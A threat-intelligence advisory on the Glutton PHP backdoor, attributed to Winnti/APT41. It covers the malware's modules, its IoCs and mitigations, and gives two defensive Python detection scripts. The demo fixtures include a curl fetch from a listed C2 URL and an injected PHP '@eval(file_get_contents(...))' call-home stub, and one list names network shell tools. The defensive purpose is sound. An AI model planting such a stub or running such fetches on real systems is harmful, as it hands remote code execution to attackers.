Winnti Group Unleashes Advanced PHP Backdoor Glutton
Threat Group: Winnti (APT41)
Threat Type: PHP-Based Backdoor Malware
Exploited Vulnerabilities: Known vulnerabilities in PHP frameworks (Laravel, ThinkPHP)
Malware Used: Glutton, ELF-based Winnti backdoor
Threat Score: High (8.5/10) – Due to its advanced modular design, stealth capabilities, and targeting of both legitimate and cybercriminal systems.
Last Threat Observation: December 17, 2024
Overview
Glutton is a modular PHP-based backdoor identified in attacks against targets in China, the United States, Cambodia, Pakistan, and South Africa. QAX's XLab attributes it, with moderate confidence, to the Chinese advanced persistent threat (APT) group Winnti (also tracked as APT41). Its modules harvest and exfiltrate system data, install backdoors, and inject malicious code into popular PHP frameworks such as Laravel and ThinkPHP.
XLab first detected Glutton in late April 2024 and found evidence that it has been active since at least December 2023. Beyond conventional victims, the operators have turned it on the cybercrime ecosystem itself: Glutton has been planted in business applications traded on cybercrime forums, so that the criminals who deploy those applications are compromised in turn, a "no honor among thieves" scenario.
Key Details
- Delivery Method: Exploitation of known vulnerabilities in PHP frameworks, and backdoored business applications distributed through cybercrime forums.
- Target: Systems running PHP frameworks, particularly those used in IT services, business operations, and social security sectors.
- Functions:
- Data Exfiltration: Harvests system information such as OS and PHP versions, along with credentials and configuration taken from Baota (bt.cn) server-management panels.
- Backdoor Installation: Deploys both an ELF-based Winnti backdoor and a PHP-based backdoor to maintain persistent access.
- Code Injection: Injects malicious code into the files of popular PHP frameworks to keep a foothold in the application and facilitate further exploitation.
- Fileless Execution: The PHP payload is fetched and executed inside the php or php-fpm process rather than written to disk, so conventional file scanners find no payload to match.
Attack Vectors
Glutton employs a modular framework that allows it to adapt to various environments and execute a series of tasks to compromise targeted systems. The primary components include:
- task_loader: Assesses the execution environment and downloads the appropriate next-stage payload.
- init_task: Installs the ELF-based Winnti backdoor (reported to run under a php-fpm process name), modifies Baota panels to capture credentials, and infects PHP files.
- client_loader: A refactored version of init_task with additional features, including the deployment of a PHP-based backdoored client.
- client_task: Manages the PHP backdoor and periodically fetches additional payloads.
Initial access comes through two channels: exploitation of known vulnerabilities in widely used PHP frameworks, and backdoored business applications that the operators seed into cybercrime forums. The second channel reaches the operators' criminal rivals as well as the specific industries they target.
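The fileless and masquerading behaviour described above translates into two concrete host checks: a process that carries a php-fpm name but runs from an executable other than the installed php-fpm binary (or from one that has since been unlinked), and a php-fpm worker that has spawned a shell or downloader. The Python script below is an added example, not code from the article or from XLab. It reads /proc on Linux; the allow-list of legitimate php-fpm binaries is derived from the usual install paths, which is an assumption to adjust for your distribution, and the process table in demo_snapshot() is constructed for the demo, not captured from an infection.

```python
import glob
import os
from dataclasses import dataclass


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    comm: str      # /proc/PID/comm, e.g. "php-fpm8.2"
    exe: str       # target of /proc/PID/exe; "" if unreadable, ends in " (deleted)" if unlinked
    cmdline: str   # argv joined with spaces, e.g. "php-fpm: pool www"


# Children a php-fpm worker has no business spawning in a typical deployment.
SUSPECT_CHILDREN = {"sh", "bash", "dash", "zsh", "curl", "wget", "nc", "ncat", "perl", "python3"}


def looks_like_php(p: Proc) -> bool:
    """True for php-fpm masters/workers and the php CLI, judged by the name they present."""
    return p.comm.startswith("php") or p.cmdline.startswith("php-fpm:")


def default_allowed_exes() -> set:
    """Assumed locations of legitimate php/php-fpm binaries; adjust for your distribution."""
    patterns = ("/usr/sbin/php-fpm*", "/usr/local/sbin/php-fpm*", "/usr/bin/php*", "/usr/local/bin/php*")
    found = set()
    for pat in patterns:
        for path in glob.glob(pat):
            found.add(os.path.realpath(path))
    return found


def collect_procs() -> list:
    """Snapshot the live process table from /proc (Linux only)."""
    procs = []
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        pid = int(entry)
        try:
            with open(f"/proc/{pid}/comm") as fh:
                comm = fh.read().strip()
            with open(f"/proc/{pid}/stat") as fh:
                # the parent pid is the second field after the ")" that closes comm
                ppid = int(fh.read().rsplit(")", 1)[1].split()[1])
            with open(f"/proc/{pid}/cmdline", "rb") as fh:
                cmdline = fh.read().replace(b"\0", b" ").decode(errors="replace").strip()
            try:
                exe = os.readlink(f"/proc/{pid}/exe")
            except OSError:
                exe = ""  # kernel thread, or a process we are not allowed to inspect
        except (OSError, ValueError, IndexError):
            continue  # the process exited while we were reading it
        procs.append(Proc(pid, ppid, comm, exe, cmdline))
    return procs


def audit(procs, allowed_exes) -> list:
    """Return (pid, reason, detail) for each process that fails one of the checks."""
    by_pid = {p.pid: p for p in procs}
    findings = []
    for p in procs:
        if looks_like_php(p):
            if p.exe.endswith(" (deleted)"):
                findings.append((p.pid, "php process whose executable was unlinked from disk", p.exe))
            elif p.exe and p.exe not in allowed_exes:
                findings.append((p.pid, "php-fpm/php name but executable outside the allow-list", p.exe))
        parent = by_pid.get(p.ppid)
        if parent is not None and looks_like_php(parent) and p.comm in SUSPECT_CHILDREN:
            findings.append((p.pid, f"{parent.comm} (pid {parent.pid}) spawned {p.comm}", p.cmdline))
    return findings


def demo_snapshot() -> list:
    """Constructed process table (not captured from a real infection) for the demo and test."""
    real = "/usr/sbin/php-fpm8.2"
    return [
        Proc(1, 0, "systemd", "/usr/lib/systemd/systemd", "/sbin/init"),
        Proc(800, 1, "php-fpm8.2", real, "php-fpm: master process (/etc/php/8.2/fpm/php-fpm.conf)"),
        Proc(801, 800, "php-fpm8.2", real, "php-fpm: pool www"),
        Proc(802, 800, "php-fpm8.2", real, "php-fpm: pool www"),
        # an ELF planted under a php-fpm name, running from a path no package manager installed
        Proc(950, 1, "php-fpm", "/lib/php-fpm", "php-fpm"),
        # a worker that spawned a shell to pull the next stage from a listed C2 URL
        Proc(960, 802, "sh", "/usr/bin/dash", "sh -c curl -s http://v20.thinkphp1.com/v20/fetch?"),
        Proc(961, 960, "curl", "/usr/bin/curl", "curl -s http://v20.thinkphp1.com/v20/fetch?"),
    ]


if __name__ == "__main__":
    for pid, reason, detail in audit(demo_snapshot(), {"/usr/sbin/php-fpm8.2"}):
        print(f"[demo] pid {pid}: {reason}: {detail}")
    if os.path.isdir("/proc"):
        for pid, reason, detail in audit(collect_procs(), default_allowed_exes()):
            print(f"[live] pid {pid}: {reason}: {detail}")
```

On the constructed table the audit flags pid 950 (php-fpm name, executable /lib/php-fpm outside the allow-list) and pid 960 (a php-fpm worker spawning sh); the curl under the shell is not flagged twice, because its parent is the shell rather than the worker. Some applications legitimately call exec() from PHP, so tune SUSPECT_CHILDREN to the deployment before alerting on the child-process check, and run the script from cron or an EDR job rather than once.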
Known Indicators of Compromise (IoCs)
- File Hashes (MD5):
- 17dfbdae01ce4f0615e9a6f4a12036c4
- 8fe73efbf5fd0207f9f4357adf081e35
- 722a9acd6d101faf3e7168bec35b08f8
- f8ca32cb0336aaa1b30b8637acd8328d
- 00c5488873e4b3e72d1ccc3da1d1f7e4
- ac290ca4b5d9bab434594b08e0883fc5
- Domains:
- cc.thinkphp1[.]com
- v6.thinkphp1[.]com
- v20.thinkphp1[.]com
- jklwang[.]com
- URLs:
- v6.thinkphp1[.]com/php?
- v20.thinkphp1[.]com/v20/init?
- v20.thinkphp1[.]com/v20/fetch?
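The indicators above are only useful if something actually checks a host against them, and the same sweep covers the "unauthorized modifications to PHP files" that the mitigation section asks for. The following Python script is an added example, not code from the article or from XLab: it walks a webroot, compares every file's MD5 against the published sample hashes, and searches file contents for the published C2 domains, so both a dropped sample and a call-home stub injected into a framework file are reported. The demo webroot it builds (a clean Laravel-style file and an index.php carrying an injected call-home) is constructed here for illustration, and MD5 is used only because that is the digest the IoCs were published in.

```python
import hashlib
import os
import re
import tempfile

# Published indicators, copied from the IoC list above (de-fanging brackets removed).
GLUTTON_MD5 = frozenset({
    "17dfbdae01ce4f0615e9a6f4a12036c4",
    "8fe73efbf5fd0207f9f4357adf081e35",
    "722a9acd6d101faf3e7168bec35b08f8",
    "f8ca32cb0336aaa1b30b8637acd8328d",
    "00c5488873e4b3e72d1ccc3da1d1f7e4",
    "ac290ca4b5d9bab434594b08e0883fc5",
})
GLUTTON_DOMAINS = ("cc.thinkphp1.com", "v6.thinkphp1.com", "v20.thinkphp1.com", "jklwang.com")

# Byte-level pattern so text and binary files are searched the same way.
DOMAIN_RE = re.compile(b"|".join(re.escape(d.encode()) for d in GLUTTON_DOMAINS), re.IGNORECASE)
MAX_BYTES = 16 * 1024 * 1024  # skip very large files; neither the samples nor an injected stub are that big


def file_md5(path: str) -> str:
    """MD5 of a file, used purely as a lookup key into the published hash list."""
    with open(path, "rb") as fh:
        return hashlib.md5(fh.read(), usedforsecurity=False).hexdigest()


def scan_webroot(root: str, bad_hashes=GLUTTON_MD5) -> list:
    """Walk root and return (path, reason, detail) for every file that either hashes to a
    published sample or contains a published C2 domain. Symlinks are not followed."""
    findings = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                if os.path.islink(path) or os.path.getsize(path) > MAX_BYTES:
                    continue
                with open(path, "rb") as fh:
                    data = fh.read()
            except OSError:
                continue
            digest = hashlib.md5(data, usedforsecurity=False).hexdigest()
            if digest in bad_hashes:
                findings.append((path, "md5-match", digest))
            match = DOMAIN_RE.search(data)
            if match:
                findings.append((path, "c2-domain", match.group(0).decode(errors="replace")))
    return findings


def build_demo_webroot() -> tuple:
    """Construct a throwaway webroot: one clean Laravel-style file and one index.php with an
    injected call-home to a listed C2 URL. Constructed for the demo, not a real sample."""
    root = tempfile.mkdtemp(prefix="glutton-demo-")
    os.makedirs(os.path.join(root, "app", "Http"))
    os.makedirs(os.path.join(root, "public"))
    clean = os.path.join(root, "app", "Http", "Kernel.php")
    with open(clean, "w") as fh:
        fh.write("<?php\nnamespace App\\Http;\nclass Kernel {}\n")
    infected = os.path.join(root, "public", "index.php")
    with open(infected, "w") as fh:
        fh.write('<?php\n'
                 '@eval(@file_get_contents("http://v20.thinkphp1.com/v20/init?id=demo"));\n'
                 'require __DIR__ . "/../vendor/autoload.php";\n')
    return root, clean, infected


if __name__ == "__main__":
    demo_root, _, _ = build_demo_webroot()
    for path, reason, detail in scan_webroot(demo_root):
        print(f"{reason}: {path} ({detail})")
```

Run it as-is to scan the constructed demo, or call scan_webroot("/var/www") on a real host; file_md5 lets you fold your own hashes into bad_hashes. A negative result means only that none of these six hashes or four domains were seen. A rebuilt sample or a payload that is fetched straight into the php-fpm process never matches on disk, which is why the process and log monitoring listed under Mitigation and Prevention matters as much as the indicator sweep.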
Mitigation and Prevention
- User Awareness: Treat business application packages as untrusted, especially those obtained from forums that trade cybercrime tooling; Glutton has been seeded into exactly such packages.
- Network Controls: Block and alert on the domains and URLs listed above at DNS and egress. A php-fpm worker serving a production application rarely needs outbound HTTP to arbitrary hosts, so any such connection deserves a look.
- Endpoint Detection: Because the PHP payload runs inside php or php-fpm without touching disk, file-based antivirus alone will miss it. Pair it with monitoring of php-fpm behaviour (child processes, outbound connections, executables running under a php-fpm name from unexpected paths) and integrity checks on framework and vendor files.
- Two-Factor Authentication (2FA): Enforce 2FA on Baota panels and other administrative consoles, so that credentials harvested from a compromised panel are not sufficient on their own.
- Monitor Logs: Review web-server, php-fpm and system logs for unexpected PHP process executions, shells spawned by PHP workers, and unauthorized modifications to PHP files, particularly framework core and vendor directories.
- Regular Updates: Keep PHP and frameworks such as Laravel and ThinkPHP patched; known framework vulnerabilities are the documented initial-access vector.
Risk Assessment
Glutton is a significant threat because of its modular design, its fileless execution, and its operators' willingness to target both legitimate systems and those run by other cybercriminals. Running inside PHP processes without a payload on disk makes detection difficult, and the combination of ELF-based and PHP-based backdoors gives the operators more than one route to persistent access. Its C2 traffic is unencrypted and its samples are plaintext, which is unusual for Winnti and is part of why XLab rates the attribution as moderate confidence; that trade-off between tradecraft and simplicity does not lessen the risk to an exposed PHP application.
Conclusion
The emergence of Glutton underscores the evolving tactics of APT groups like Winnti, highlighting their willingness to target both traditional victims and fellow cybercriminals to achieve their objectives. This development calls for heightened vigilance and the implementation of robust security measures to detect and mitigate such threats effectively.
Sources:
- The Hacker News - New Glutton Malware Exploits Popular PHP Frameworks Like Laravel and ThinkPHP
- Cyberscoop - PHP backdoor looks to be work of Chinese-linked APT group
- Bleeping Computer - Winnti hackers target other threat actors with new Glutton PHP backdoor